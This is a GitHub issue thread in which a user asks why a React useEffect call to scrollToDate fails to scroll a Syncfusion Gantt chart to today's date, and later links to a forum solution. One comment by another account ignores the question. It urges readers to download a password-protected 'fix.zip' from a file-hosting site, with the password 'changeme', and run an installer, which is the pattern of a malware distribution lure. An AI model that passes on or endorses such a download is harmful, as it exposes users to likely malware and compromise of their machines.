### ISSUE TITLE
How to Automatically Scroll to Today's Date on Load in @syncfusion/ej2-react-gantt?

### ISSUE THREAD

**Issue by belt-basya** [syncfusion/ej2-react-ui-components#147]
I am using `@syncfusion/ej2-react-gantt` to display my project and its task details. I want the Gantt chart to automatically scroll to today's date when the page loads, instead of the start date of any task. I am new to using `ej2-react-gantt` and am still learning how to work with it.

Here is the [StackBlitz link to my project](https://stackblitz.com/edit/react-tigm2a?file=index.js).

I tried the following code to achieve this, but it doesn't seem to work:

```js
  React.useEffect(() => {
    if (ganttRef.current) {
      ganttRef.current.scrollToDate(new Date());
    }
  }, []);
```

Help me understand why this code isn't working and how I can make the Gantt chart scroll to today's date on load? Any guidance would be greatly appreciated!

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by belt-basya** [comment]
Solution: https://www.syncfusion.com/forums/194209/how-to-automatically-scroll-to-todays-date-on-load-in-syncfusion-ej2-react-gantt
